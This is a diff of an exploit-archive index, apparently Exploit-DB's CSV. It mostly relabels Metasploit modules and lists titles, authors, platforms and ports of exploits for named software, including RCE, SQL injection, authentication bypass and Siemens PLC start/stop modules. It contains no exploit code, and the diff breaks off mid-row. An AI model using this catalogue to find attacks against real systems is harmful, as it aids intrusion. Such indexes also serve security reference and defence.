19410,platforms/windows/dos/19410.py,"Qbik WinGate 3.0/Pro 4.0.1/Standard 4.0.1 - Buffer Overflow DoS",1999-02-22,Prizm,windows,dos,0 19406,platforms/linux/webapps/19406.txt,"symantec Web gateway 5.0.2.8 - Multiple Vulnerabilities",2012-06-27,"S2 Crew",linux,webapps,0 19321,platforms/windows/webapps/19321.txt,"IBM System Storage DS Storage Manager Profiler - Multiple Vulnerabilities",2012-06-21,LiquidWorm,windows,webapps,0 -19322,platforms/windows/remote/19322.rb,"Apple iTunes <= 10.6.1.7 Extended m3u Stack Buffer Overflow",2012-06-21,Rh0,windows,remote,0 +19322,platforms/windows/remote/19322.rb,"Apple iTunes <= 10.6.1.7 Extended m3u Stack Buffer Overflow (Metasploit)",2012-06-21,Rh0,windows,remote,0 19326,platforms/solaris/local/19326.txt,"Sun Solaris 7.0 procfs",1999-03-09,"Toomas Soome",solaris,local,0 19323,platforms/windows/local/19323.c,"URL Hunter Buffer Overflow DEP Bypass",2012-06-21,Ayrbyte,windows,local,0 19324,platforms/php/webapps/19324.txt,"traq 2.3.5 - Multiple Vulnerabilities",2012-06-21,AkaStep,php,webapps,0 @@ -16892,7 +16892,7 @@ id,file,description,date,author,platform,type,port 19523,platforms/linux/local/19523.txt,"python-wrapper Untrusted Search Path/Code Execution",2012-07-02,ShadowHatesYou,linux,local,0 19524,platforms/php/webapps/19524.txt,"WordPress Backup Plugin 2.0.1 - Information Disclosure",2012-07-02,"Stephan Knauss",php,webapps,0 19525,platforms/windows/webapps/19525.txt,"IIS Short File/Folder Name Disclosure",2012-07-02,"Soroush Dalili",windows,webapps,0 -19526,platforms/hardware/webapps/19526.rb,"WANGKONGBAO CNS-1000 UTM IPS-FW Directory Traversal",2012-07-02,"Dillon Beresford",hardware,webapps,0 +19526,platforms/hardware/webapps/19526.rb,"WANGKONGBAO CNS-1000 UTM IPS-FW Directory Traversal (Metasploit)",2012-07-02,"Dillon Beresford",hardware,webapps,0 19528,platforms/windows/local/19528.txt,"Microsoft Internet Explorer 4.1/5.0 Registration Wizard Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0 19529,platforms/solaris/local/19529.c,"Solaris 7.0 /usr/bin/mail -m - Local Buffer Overflow",1999-09-12,"Brock Tellier",solaris,local,0 19530,platforms/windows/remote/19530.txt,"Microsoft Internet Explorer 5.0 Download Behavior",1999-09-27,"Georgi Guninski",windows,remote,0 @@ -16993,7 +16993,7 @@ id,file,description,date,author,platform,type,port 19622,platforms/windows/remote/19622.c,"Antelope Software W4-Server 2.6 a/Win32 Cgitest.exe Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 19623,platforms/windows/remote/19623.c,"International TeleCommunications WebBBS 2.13 login & password Buffer Overflow",1999-11-15,UNYUN,windows,remote,0 19624,platforms/windows/dos/19624.txt,"Gene6 G6 FTP Server 2.0 - Buffer Overflow DoS",1999-11-17,"Ussr Labs",windows,dos,0 -19625,platforms/windows/remote/19625.py,"ALLMediaServer 0.8 SEH Overflow Exploit",2012-07-06,"motaz reda",windows,remote,888 +19625,platforms/windows/remote/19625.py,"ALLMediaServer 0.8 - SEH Overflow Exploit",2012-07-06,"motaz reda",windows,remote,888 19626,platforms/php/webapps/19626.txt,"sflog! <= 1.00 - Multiple Vulnerabilities",2012-07-06,dun,php,webapps,0 19628,platforms/php/webapps/19628.txt,"Event Script PHP 1.1 CMS - Multiple Vulnerabilities",2012-07-06,Vulnerability-Lab,php,webapps,0 19629,platforms/php/webapps/19629.txt,"Webmatic 3.1.1 - Blind SQL Injection",2012-07-06,"High-Tech Bridge SA",php,webapps,0 @@ -17190,9 +17190,9 @@ id,file,description,date,author,platform,type,port 19963,platforms/windows/dos/19963.txt,"PHP 6.0 openssl_verify() Local Buffer Overflow PoC",2012-07-20,"Yakir Wizman",windows,dos,0 19828,platforms/multiple/remote/19828.txt,"Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure",2000-03-31,"Paul Schreiber",multiple,remote,0 19829,platforms/php/webapps/19829.txt,"Joomla OS Property 2.0.2 Unrestricted File Upload",2012-07-14,D4NB4R,php,webapps,0 -19831,platforms/hardware/remote/19831.rb,"Siemens Simatic S7-300/400 CPU START/STOP Module",2012-07-14,"Dillon Beresford",hardware,remote,102 -19832,platforms/hardware/remote/19832.rb,"Siemens Simatic S7-300 PLC Remote Memory Viewer",2012-07-14,"Dillon Beresford",hardware,remote,8080 -19833,platforms/hardware/remote/19833.rb,"Siemens Simatic S7-1200 CPU START/STOP Module",2012-07-14,"Dillon Beresford",hardware,remote,0 +19831,platforms/hardware/remote/19831.rb,"Siemens Simatic S7-300/400 CPU START/STOP Module (Metasploit)",2012-07-14,"Dillon Beresford",hardware,remote,102 +19832,platforms/hardware/remote/19832.rb,"Siemens Simatic S7-300 PLC Remote Memory Viewer (Metasploit)",2012-07-14,"Dillon Beresford",hardware,remote,8080 +19833,platforms/hardware/remote/19833.rb,"Siemens Simatic S7-1200 CPU START/STOP Module (Metasploit)",2012-07-14,"Dillon Beresford",hardware,remote,0 19834,platforms/windows/dos/19834.txt,"Real Networks RealPlayer 6/7 Location Buffer Overflow",2000-04-03,"Adam Muntner",windows,dos,0 19835,platforms/windows/dos/19835.txt,"SalesLogix Corporation eViewer 1.0 DoS",2000-03-31,"Todd Beebe",windows,dos,0 19836,platforms/windows/local/19836.c,"Symantec pcAnywhere 9.0 Weak Encryption",2000-04-06,"Pascal Longpre",windows,local,0 @@ -18020,7 +18020,7 @@ id,file,description,date,author,platform,type,port 20697,platforms/unix/local/20697.c,"DG/UX 4.20 lpsched Long Error Message Buffer Overflow",2001-03-19,"Luciano Rocha",unix,local,0 20707,platforms/linux/webapps/20707.py,"Symantec Web Gateway <= 5.0.3.18 - Arbitrary Password Change",2012-08-21,Kc57,linux,webapps,0 20708,platforms/php/webapps/20708.txt,"Clipbucket 2.5 - Blind SQLi",2012-08-21,loneferret,php,webapps,0 -20702,platforms/windows/remote/20702.rb,"Sysax Multi Server 5.64 - Create Folder Buffer Overflow",2012-08-21,"Matt Andreko",windows,remote,0 +20702,platforms/windows/remote/20702.rb,"Sysax Multi Server 5.64 - Create Folder Buffer Overflow (Metasploit)",2012-08-21,"Matt Andreko",windows,remote,0 20703,platforms/php/webapps/20703.txt,"XODA Document Management System 0.4.5 - XSS & Arbitrary File Upload",2012-08-21,"Shai rod",php,webapps,0 20714,platforms/cgi/remote/20714.txt,"anaconda clipper 3.3 - Directory Traversal",2001-03-27,"UkR hacking team",cgi,remote,0 20715,platforms/solaris/local/20715.txt,"Junsoft JSparm 4.0 Logging Output File",2001-03-23,KimYongJun,solaris,local,0 @@ -19191,7 +19191,7 @@ id,file,description,date,author,platform,type,port 21924,platforms/asp/webapps/21924.txt,"SurfControl SuperScout Email Filter 3.5 MsgError.ASP Cross-Site Scripting",2002-10-08,ken@FTU,asp,webapps,0 21925,platforms/asp/webapps/21925.txt,"SurfControl SuperScout Email Filter 3.5 User Credential Disclosure",2002-10-08,ken@FTU,asp,webapps,0 21926,platforms/cgi/webapps/21926.txt,"Authoria HR Suite AthCGI.EXE Cross-Site Scripting",2002-10-09,Max,cgi,webapps,0 -21927,platforms/multiple/remote/21927.rb,"Metasploit < 4.4 - pcap_log Plugin Privilege Escalation Exploit",2012-10-12,0a29406d9794e4f9b30b3c5d6702c708,multiple,remote,0 +21927,platforms/multiple/remote/21927.rb,"Metasploit < 4.4 - pcap_log Plugin Privilege Escalation Exploit (Metasploit)",2012-10-12,0a29406d9794e4f9b30b3c5d6702c708,multiple,remote,0 21930,platforms/php/webapps/21930.txt,"PHPReactor 1.2.7 pl1 Browse.php Cross-Site Scripting",2002-10-10,"Arab VieruZ",php,webapps,0 21929,platforms/php/webapps/21929.rb,"Project Pier Arbitrary File Upload",2012-10-16,Metasploit,php,webapps,0 21931,platforms/php/webapps/21931.txt,"PHPBBMod 1.3.3 PHPInfo Information Disclosure",2002-10-10,"Roland Verlander",php,webapps,0 @@ -19922,7 +19922,7 @@ id,file,description,date,author,platform,type,port 22675,platforms/php/webapps/22675.txt,"Geeklog 1.3.x - Authentication SQL Injection",2003-05-29,pokleyzz,php,webapps,0 22676,platforms/windows/remote/22676.txt,"M-TECH P-Synch 6.2.5 nph-psf.exe css Parameter XSS",2003-05-29,JeiAr,windows,remote,0 22677,platforms/windows/remote/22677.txt,"M-TECH P-Synch 6.2.5 nph-psa.exe css Parameter XSS",2003-05-29,JeiAr,windows,remote,0 -22678,platforms/windows/remote/22678.rb,"Jira Scriptrunner 2.0.7 - CSRF/RCE Exploit",2012-11-13,"Ben Sheppard",windows,remote,0 +22678,platforms/windows/remote/22678.rb,"Jira Scriptrunner 2.0.7 - CSRF/RCE Exploit (Metasploit)",2012-11-13,"Ben Sheppard",windows,remote,0 22679,platforms/windows/dos/22679.txt,"Microsoft Visio 2010 Crash PoC",2012-11-13,coolkaveh,windows,dos,0 22680,platforms/windows/dos/22680.txt,"IrfanView RLE Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos,0 22681,platforms/windows/dos/22681.txt,"IrfanView - .TIF Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos,0 @@ -20741,7 +20741,7 @@ id,file,description,date,author,platform,type,port 23520,platforms/php/webapps/23520.txt,"PhpGedView 2.61 - Multiple PHP Remote File Include Vulnerabilities",2004-01-06,Windak,php,webapps,0 23691,platforms/php/webapps/23691.txt,"VBulletin 3.0 - Search.php Cross-Site Scripting",2004-02-13,"Rafel Ivgi The-Insider",php,webapps,0 23692,platforms/windows/dos/23692.txt,"Sami FTP Server 1.1.3 Invalid Command Argument Local DoS",2004-02-13,"intuit e.b.",windows,dos,0 -23522,platforms/multiple/remote/23522.rb,"NetWin SurgeFTP Authenticated Admin Command Injection",2012-12-20,"Spencer McIntyre",multiple,remote,0 +23522,platforms/multiple/remote/23522.rb,"NetWin SurgeFTP Authenticated Admin Command Injection (Metasploit)",2012-12-20,"Spencer McIntyre",multiple,remote,0 23523,platforms/linux/dos/23523.c,"gdb (GNU debugger) <= 7.5.1NULL Pointer Dereference",2012-12-20,nitr0us,linux,dos,0 23524,platforms/multiple/dos/23524.c,"IDA Pro 6.3 - Crash PoC",2012-12-20,nitr0us,multiple,dos,0 23525,platforms/php/webapps/23525.txt,"PhpGedView 2.61 - Search Script Cross-Site Scripting",2004-01-06,Windak,php,webapps,0 @@ -21646,7 +21646,7 @@ id,file,description,date,author,platform,type,port 24464,platforms/hardware/webapps/24464.txt,"Netgear DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,hardware,webapps,0 24465,platforms/php/webapps/24465.txt,"CubeCart 5.2.0 - (cubecart.class.php) PHP Object Injection",2013-02-07,EgiX,php,webapps,0 24466,platforms/hardware/webapps/24466.txt,"WirelessFiles 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-07,Vulnerability-Lab,hardware,webapps,0 -24467,platforms/windows/remote/24467.rb,"ActFax 5.01 - RAW Server Exploit",2013-02-07,"Craig Freyman",windows,remote,0 +24467,platforms/windows/remote/24467.rb,"ActFax 5.01 - RAW Server Exploit (Metasploit)",2013-02-07,"Craig Freyman",windows,remote,0 24468,platforms/windows/dos/24468.pl,"KMPlayer - Denial of Service",2013-02-10,Jigsaw,windows,dos,0 24510,platforms/php/webapps/24510.txt,"Scripts Genie Domain Trader (catalog.php id param) - SQL Injection",2013-02-17,3spi0n,php,webapps,0 24511,platforms/windows/dos/24511.txt,"SAP Netweaver Message Server - Multiple Vulnerabilities",2013-02-17,"Core Security",windows,dos,0 @@ -21668,9 +21668,9 @@ id,file,description,date,author,platform,type,port 24520,platforms/php/webapps/24520.txt,"Piwigo 2.4.6 - (install.php) Remote Arbitrary File Read/Delete",2013-02-19,LiquidWorm,php,webapps,0 24509,platforms/php/webapps/24509.txt,"Scripts Genie Games Site Script (index.php id param) - SQL Injection",2013-02-17,3spi0n,php,webapps,0 24490,platforms/windows/remote/24490.rb,"Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution",2013-02-12,Metasploit,windows,remote,0 -24494,platforms/hardware/remote/24494.rb,"Polycom HDX Telnet Authorization Bypass",2013-02-14,"Paul Haas",hardware,remote,23 +24494,platforms/hardware/remote/24494.rb,"Polycom HDX Telnet Authorization Bypass (Metasploit)",2013-02-14,"Paul Haas",hardware,remote,23 24492,platforms/php/webapps/24492.php,"OpenEMR 4.1.1 - (ofc_upload_image.php) Arbitrary File Upload",2013-02-13,LiquidWorm,php,webapps,0 -24495,platforms/windows/remote/24495.rb,"Microsoft Internet Explorer SLayoutRun Use-After-Free (MS13-009)",2013-02-14,"Scott Bell",windows,remote,0 +24495,platforms/windows/remote/24495.rb,"Microsoft Internet Explorer SLayoutRun Use-After-Free (MS13-009) (Metasploit)",2013-02-14,"Scott Bell",windows,remote,0 24496,platforms/windows/webapps/24496.txt,"Sonicwall Scrutinizer 9.5.2 - SQL Injection",2013-02-14,Vulnerability-Lab,windows,webapps,0 24497,platforms/hardware/webapps/24497.txt,"Transferable Remote 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-14,Vulnerability-Lab,hardware,webapps,0 24498,platforms/hardware/webapps/24498.txt,"OpenPLI 3.0 beta (OpenPLi-beta-dm7000-20130127-272) - Multiple Vulnerabilities",2013-02-14,m-1-k-3,hardware,webapps,0 @@ -22034,7 +22034,7 @@ id,file,description,date,author,platform,type,port 24880,platforms/windows/dos/24880.pl,"IconCool MP3 WAV Converter 3.00 Build 120518 - Stack Buffer Overflow",2013-03-25,G0li47h,windows,dos,0 24881,platforms/php/webapps/24881.txt,"ClipShare 4.1.1 (gmembers.php gid param) - Blind SQL Injection",2013-03-25,Esac,php,webapps,0 24882,platforms/php/webapps/24882.pl,"vBulletin 5.0.0 Beta 11 < 5.0.0 Beta 28 - SQL Injection",2013-03-25,"Orestis Kourides",php,webapps,0 -24883,platforms/php/webapps/24883.rb,"Ra1NX PHP Bot - pubcall Authentication Bypass Remote Code Execution",2013-03-25,bwall,php,webapps,0 +24883,platforms/php/webapps/24883.rb,"Ra1NX PHP Bot - pubcall Authentication Bypass Remote Code Execution (Metasploit)",2013-03-25,bwall,php,webapps,0 24884,platforms/windows/local/24884.html,"LiquidXML Studio 2012 - ActiveX Insecure Method Executable File Creation (0Day)",2013-03-25,Dr_IDE,windows,local,0 24885,platforms/windows/local/24885.html,"LiquidXML Studio 2010 - ActiveX Remote (0Day)",2013-03-25,Dr_IDE,windows,local,0 24886,platforms/windows/remote/24886.html,"Mitsubishi MX ActiveX Component 3 - (ActUWzd.dll (WzTitle)) Remote Exploit",2013-03-25,Dr_IDE,windows,remote,0 @@ -22085,7 +22085,7 @@ id,file,description,date,author,platform,type,port 27433,platforms/windows/dos/27433.txt,"Microsoft Internet Explorer 5.0.1 Script Action Handler Buffer Overflow",2006-03-16,"Michal Zalewski",windows,dos,0 24957,platforms/php/webapps/24957.txt,"Vanilla Forums Van2Shout Plugin 1.0.51 - Multiple CSRF Vulnerabilities",2013-04-15,"Henry Hoggard",php,webapps,0 24950,platforms/windows/remote/24950.pl,"KNet Web Server 1.04b - Stack Corruption BoF",2013-04-12,Wireghoul,windows,remote,0 -24968,platforms/windows/dos/24968.rb,"Mikrotik Syslog Server for Windows 1.15 - Denial of Service",2013-04-22,xis_one,windows,dos,514 +24968,platforms/windows/dos/24968.rb,"Mikrotik Syslog Server for Windows 1.15 - Denial of Service (Metasploit)",2013-04-22,xis_one,windows,dos,514 24969,platforms/php/webapps/24969.txt,"CiviCRM for Joomla 4.2.2 - Remote Code Injection",2013-04-22,iskorpitx,php,webapps,0 24942,platforms/php/webapps/24942.txt,"ZAPms 1.41 - SQL Injection",2013-04-09,NoGe,php,webapps,0 643,platforms/windows/remote/643.c,"SLMail 5.5 - POP3 PASS Remote Buffer Overflow Exploit",2004-12-21,"Haroon Rashid Astwat",windows,remote,0 @@ -22107,7 +22107,7 @@ id,file,description,date,author,platform,type,port 24960,platforms/php/webapps/24960.txt,"phpVms Virtual Airline Administration 2.1.934 & 2.1.935 - SQL Injection",2013-04-15,NoGe,php,webapps,0 24961,platforms/windows/remote/24961.html,"FirePHP Firefox Plugin 0.7.1 - Remote Command Execution",2013-04-17,Wireghoul,windows,remote,0 24962,platforms/windows/dos/24962.txt,"Foxit Reader 5.4.3.x < 5.4.5.0124 - PDF XREF Parsing Denial of Service",2013-04-18,FuzzMyApp,windows,dos,0 -24963,platforms/multiple/remote/24963.rb,"SAP ConfigServlet OS Command Execution",2013-04-18,"Andras Kabai",multiple,remote,50000 +24963,platforms/multiple/remote/24963.rb,"SAP ConfigServlet OS Command Execution (Metasploit)",2013-04-18,"Andras Kabai",multiple,remote,50000 24964,platforms/windows/webapps/24964.txt,"Oracle WebCenter Sites Satellite Server - HTTP Header Injection",2013-04-18,"SEC Consult",windows,webapps,0 24965,platforms/php/webapps/24965.txt,"KrisonAV CMS 3.0.1 - Multiple Vulnerabilities",2013-04-18,"High-Tech Bridge SA",php,webapps,0 24966,platforms/windows/dos/24966.txt,"Java Web Start Launcher ActiveX Control - Memory Corruption",2013-04-18,"SEC Consult",windows,dos,0 @@ -22140,7 +22140,7 @@ id,file,description,date,author,platform,type,port 24993,platforms/php/webapps/24993.txt,"WordPress 1.2.1/1.2.2 - moderation.php item_approved Parameter XSS",2004-12-16,"Thomas Waldegger",php,webapps,0 24994,platforms/php/webapps/24994.txt,"MediaWiki 1.3.x - Remote Arbitrary Script Upload",2004-12-16,"Jeremy Bae",php,webapps,0 24995,platforms/multiple/remote/24995.txt,"DXFScope 0.2 - Remote Client-Side Buffer Overflow",2004-12-16,"Ariel Berkman",multiple,remote,0 -24996,platforms/windows/remote/24996.rb,"SAP ConfigServlet Remote Unauthenticated Payload Execution",2013-04-25,"Andras Kabai",windows,remote,0 +24996,platforms/windows/remote/24996.rb,"SAP ConfigServlet Remote Unauthenticated Payload Execution (Metasploit)",2013-04-25,"Andras Kabai",windows,remote,0 25184,platforms/php/webapps/25184.txt,"ProjectBB 0.4.5.1 - Multiple SQL Injection Vulnerabilities",2005-03-02,"benji lemien",php,webapps,0 25185,platforms/php/webapps/25185.txt,"D-Forum 1.11 Nav.php3 - Cross-Site Scripting",2005-03-03,benjilenoob,php,webapps,0 25186,platforms/php/webapps/25186.txt,"Typo3 CMW_Linklist 1.4.1 Extension SQL Injection",2005-03-03,"Fabian Becker",php,webapps,0 @@ -23139,7 +23139,7 @@ id,file,description,date,author,platform,type,port 25996,platforms/php/webapps/25996.txt,"RuubikCMS 1.1.1 - Stored XSS",2013-06-07,expl0i13r,php,webapps,0 25997,platforms/php/webapps/25997.txt,"tForum b0.9 Member.php Cross-Site Scripting",2005-07-18,wannacut,php,webapps,0 25998,platforms/hardware/webapps/25998.txt,"Asus RT56U 3.0.0.4.360 - Remote Command Injection",2013-06-07,drone,hardware,webapps,0 -25999,platforms/windows/remote/25999.rb,"Microsoft Internet Explorer textNode Use-After-Free",2013-06-07,"Scott Bell",windows,remote,0 +25999,platforms/windows/remote/25999.rb,"Microsoft Internet Explorer textNode Use-After-Free (Metasploit)",2013-06-07,"Scott Bell",windows,remote,0 26001,platforms/java/webapps/26001.txt,"Novell GroupWise 6.5 WebAccess HTML Injection",2005-07-15,"Francisco Amato",java,webapps,0 26002,platforms/multiple/remote/26002.txt,"Oracle Reports Server 6.0.8/9.0.x XML File Disclosure",2005-07-19,"Alexander Kornbrust",multiple,remote,0 26003,platforms/multiple/remote/26003.txt,"Oracle Reports Server 6.0.8/9.0.x - Arbitrary File Disclosure",2005-07-19,"Alexander Kornbrust",multiple,remote,0 @@ -23267,7 +23267,7 @@ id,file,description,date,author,platform,type,port 26120,platforms/php/webapps/26120.txt,"FunkBoard 0.66 reply.php Multiple Parameter XSS",2005-08-08,rgod,php,webapps,0 26121,platforms/php/webapps/26121.txt,"FunkBoard 0.66 profile.php Multiple Parameter XSS",2005-08-08,rgod,php,webapps,0 26122,platforms/php/webapps/26122.txt,"FunkBoard 0.66 register.php Multiple Parameter XSS",2005-08-08,rgod,php,webapps,0 -26123,platforms/multiple/remote/26123.rb,"Java Web Start Double Quote Injection Remote Code Execution",2013-06-11,Rh0,multiple,remote,0 +26123,platforms/multiple/remote/26123.rb,"Java Web Start Double Quote Injection Remote Code Execution (Metasploit)",2013-06-11,Rh0,multiple,remote,0 26124,platforms/php/webapps/26124.txt,"WordPress WP-SendSms Plugin 1.0 - Multiple Vulnerabilities",2013-06-11,expl0i13r,php,webapps,0 26125,platforms/php/webapps/26125.txt,"Weathermap 0.97c (editor.php mapname param) - Local File Inclusion",2013-06-11,"Anthony Dubuissez",php,webapps,0 26126,platforms/php/webapps/26126.txt,"NanoBB 0.7 - Multiple Vulnerabilities",2013-06-11,"CWH Underground",php,webapps,0 @@ -25459,7 +25459,7 @@ id,file,description,date,author,platform,type,port 28405,platforms/linux/local/28405.txt,"Roxio Toast 7 - DejaVu Component PATH Variable Local Privilege Escalation",2006-08-18,Netragard,linux,local,0 28406,platforms/php/webapps/28406.txt,"XennoBB 1.0.x/2.2 Icon_Topic SQL Injection",2006-08-19,"Chris Boulton",php,webapps,0 28407,platforms/php/remote/28407.rb,"Western Digital Arkeia - Remote Code Execution (Metasploit)",2013-09-20,xistence,php,remote,0 -28408,platforms/php/remote/28408.rb,"OpenEMR 4.1.1 Patch 14 - SQLi Privilege Escalation Remote Code Execution",2013-09-20,xistence,php,remote,0 +28408,platforms/php/remote/28408.rb,"OpenEMR 4.1.1 Patch 14 - SQLi Privilege Escalation Remote Code Execution (Metasploit)",2013-09-20,xistence,php,remote,0 28409,platforms/php/webapps/28409.txt,"Vtiger CRM 5.4.0 (index.php onlyforuser param) - SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0 28410,platforms/php/webapps/28410.txt,"Mambo Display MOSBot Manager Component mosConfig_absolute_path Remote File Include",2006-08-21,O.U.T.L.A.W,php,webapps,0 28411,platforms/php/webapps/28411.txt,"DieselScripts Job Site Forgot.php Multiple Cross-Site Scripting Vulnerabilities",2006-08-21,night_warrior771,php,webapps,0 @@ -26006,7 +26006,7 @@ id,file,description,date,author,platform,type,port 28969,platforms/windows/local/28969.py,"Beetel Connection Manager PCW_BTLINDV1.0.0B04 - SEH Buffer Overflow",2013-10-15,metacom,windows,local,0 28970,platforms/php/webapps/28970.txt,"Dexs PM System WordPress Plugin - Authenticated Persistent XSS (0Day)",2013-10-15,TheXero,php,webapps,80 28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 (exportcsv.php sondage param) - SQL Injection",2013-10-15,drone,php,webapps,80 -28972,platforms/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection / Remote Code Execution",2013-10-15,"Jason Kratzer",unix,webapps,0 +28972,platforms/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection / Remote Code Execution (Metasploit)",2013-10-15,"Jason Kratzer",unix,webapps,0 28973,platforms/windows/remote/28973.rb,"HP Data Protector Cell Request Service Buffer Overflow",2013-10-15,Metasploit,windows,remote,0 28974,platforms/windows/remote/28974.rb,"Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080)",2013-10-15,Metasploit,windows,remote,0 28975,platforms/ios/webapps/28975.txt,"My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps,0 @@ -26072,7 +26072,7 @@ id,file,description,date,author,platform,type,port 29032,platforms/windows/remote/29032.txt,"Conxint FTP 2.2.603 - Multiple Directory Traversal Vulnerabilities",2006-11-15,"Greg Linares",windows,remote,0 29033,platforms/linux/remote/29033.html,"Links_ ELinks 'smbclient' - Remote Command Execution",2006-11-18,"Teemu Salmela",linux,remote,0 29034,platforms/multiple/webapps/29034.txt,"Elite Graphix ElitCMS 1.01 & PRO - Multiple Web Vulnerabilities",2013-10-18,Vulnerability-Lab,multiple,webapps,0 -29035,platforms/windows/remote/29035.rb,"SikaBoom - Remote Buffer Overflow",2013-10-18,Asesino04,windows,remote,0 +29035,platforms/windows/remote/29035.rb,"SikaBoom - Remote Buffer Overflow (Metasploit)",2013-10-18,Asesino04,windows,remote,0 29036,platforms/windows/dos/29036.pl,"Teamtek Universal FTP Server Multiple Commands Remote Denial of Service Vulnerabilities",2006-11-15,"Praveen Darhanam",windows,dos,0 29037,platforms/asp/webapps/29037.txt,"CandyPress Store 3.5.2 14 openPolicy.asp policy Parameter SQL Injection",2006-11-15,"laurent gaffie",asp,webapps,0 29038,platforms/asp/webapps/29038.txt,"CandyPress Store 3.5.2 14 prodList.asp brand Parameter SQL Injection",2006-11-15,"laurent gaffie",asp,webapps,0 @@ -26723,7 +26723,7 @@ id,file,description,date,author,platform,type,port 30191,platforms/jsp/webapps/30191.txt,"Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross-Site Scripting",2007-06-14,"Rajat Swarup",jsp,webapps,0 30192,platforms/windows/local/30192.txt,"Kaspersky Internet Security 6.0 - SSDT Hooks Multiple Local Vulnerabilities",2007-06-15,"Matousec Transparent security",windows,local,0 29672,platforms/php/webapps/29672.txt,"LiveZilla 5.0.1.4 - Remote Code Execution",2013-11-18,"Curesec Research Team",php,webapps,80 -29673,platforms/hardware/webapps/29673.txt,"Dahua DVR 2.608.0000.0 / 2.608.GV00.0 - Authentication Bypass",2013-11-18,"Jake Reynolds",hardware,webapps,37777 +29673,platforms/hardware/webapps/29673.txt,"Dahua DVR 2.608.0000.0 / 2.608.GV00.0 - Authentication Bypass (Metasploit)",2013-11-18,"Jake Reynolds",hardware,webapps,37777 29674,platforms/jsp/webapps/29674.txt,"ManageEngine DesktopCentral 8.0.0 build < 80293 - Arbitrary File Upload",2013-11-18,Security-Assessment.com,jsp,webapps,0 29675,platforms/asp/webapps/29675.txt,"Kaseya < 6.3.0.2 - Arbitrary File Upload",2013-11-18,Security-Assessment.com,asp,webapps,0 29789,platforms/php/webapps/29789.txt,"LimeSurvey 2.00+ (build 131107) - Multiple Vulnerabilities",2013-11-23,LiquidWorm,php,webapps,0 @@ -27268,7 +27268,7 @@ id,file,description,date,author,platform,type,port 30379,platforms/php/webapps/30379.html,"Webbler CMS 3.1.3 Mail A Friend Open Email Relay",2007-07-24,"Adrian Pastor",php,webapps,0 30380,platforms/php/webapps/30380.txt,"CPanel 10.9.1 Resname Parameter Cross-Site Scripting",2007-07-24,"Aria-Security Team",php,webapps,0 30381,platforms/windows/remote/30381.txt,"Multiple Browser URI Handlers Command Injection Vulnerabilities",2007-07-25,"Billy Rios",windows,remote,0 -30336,platforms/windows/local/30336.py,"VUPlayer 2.49 - (.M3U) Universal Buffer Overflow (DEP Bypass)",2013-12-16,"Morteza Hashemi",windows,local,0 +30336,platforms/windows/local/30336.py,"VUPlayer 2.49 - (.m3u) Universal Buffer Overflow (DEP Bypass)",2013-12-16,"Morteza Hashemi",windows,local,0 30802,platforms/windows/local/30802.c,"VMware Tools 3.1 - HGFS.Sys Local Privilege Escalation",2007-11-24,SoBeIt,windows,local,0 30803,platforms/php/webapps/30803.txt,"CoolShot E-Lite POS 1.0 Login SQL Injection",2007-11-24,"Aria-Security Team",php,webapps,0 30793,platforms/asp/webapps/30793.txt,"VUNET Mass Mailer 'default.asp' SQL Injection",2007-11-21,"Aria-Security Team",asp,webapps,0 @@ -27517,7 +27517,7 @@ id,file,description,date,author,platform,type,port 32388,platforms/php/webapps/32388.txt,"Cars & Vehicle - 'page.php' SQL Injection",2008-09-17,"Hussin X",php,webapps,0 32705,platforms/windows/dos/32705.py,"EagleGet 1.1.8.1 - Denial of Service Exploit",2014-04-06,"Interference Security",windows,dos,0 32277,platforms/linux/remote/32277.txt,"Nginx 1.4.0 (64-bit) - (Generic Linux) Remote Exploit",2014-03-15,sorbo,linux,remote,0 -33984,platforms/hardware/webapps/33984.rb,"Netgear WNR1000v3 - Password Recovery Credential Disclosure",2014-07-07,c1ph04,hardware,webapps,0 +33984,platforms/hardware/webapps/33984.rb,"Netgear WNR1000v3 - Password Recovery Credential Disclosure (Metasploit)",2014-07-07,c1ph04,hardware,webapps,0 30580,platforms/linux/dos/30580.txt,"KMPlayer 2.9.3.1214 - Multiple Remote Denial of Service Vulnerabilities",2007-09-12,"Code Audit Labs",linux,dos,0 30581,platforms/php/webapps/30581.txt,"CS-Guestbook 0.1 Login Credentials Information Disclosure",2007-09-12,Cr@zy_King,php,webapps,0 30582,platforms/windows/remote/30582.html,"WinSCP <= 4.0.3 URL Protocol Handler Arbitrary File Access",2007-09-13,Kender.Security,windows,remote,0 @@ -28503,7 +28503,7 @@ id,file,description,date,author,platform,type,port 31639,platforms/php/webapps/31639.txt,"Trillian 3.1.9 - DTD File XML Parser Buffer Overflow",2008-04-11,david130490,php,webapps,0 31640,platforms/php/webapps/31640.txt,"osCommerce Poll Booth 2.0 AddOn - 'pollbooth.php' SQL Injection",2008-04-13,S@BUN,php,webapps,0 31641,platforms/java/webapps/31641.txt,"Business Objects Infoview - 'cms' Parameter Cross-Site Scripting",2008-04-14,"Sebastien gioria",java,webapps,0 -31643,platforms/windows/local/31643.rb,"Easy CD-DA Recorder - (PLS File) Buffer Overflow",2014-02-13,Metasploit,windows,local,0 +31643,platforms/windows/local/31643.rb,"Easy CD-DA Recorder - (.pls) Buffer Overflow",2014-02-13,Metasploit,windows,local,0 31644,platforms/asp/webapps/31644.txt,"Cezanne 6.5.1/7 - CFLookUP.asp Multiple Parameter XSS",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 31645,platforms/asp/webapps/31645.txt,"Cezanne 6.5.1/7 - CznCustomContainer.asp Multiple Parameter XSS",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0 31646,platforms/asp/webapps/31646.txt,"Cezanne 6.5.1/7 - home.asp CFTARGET Parameter 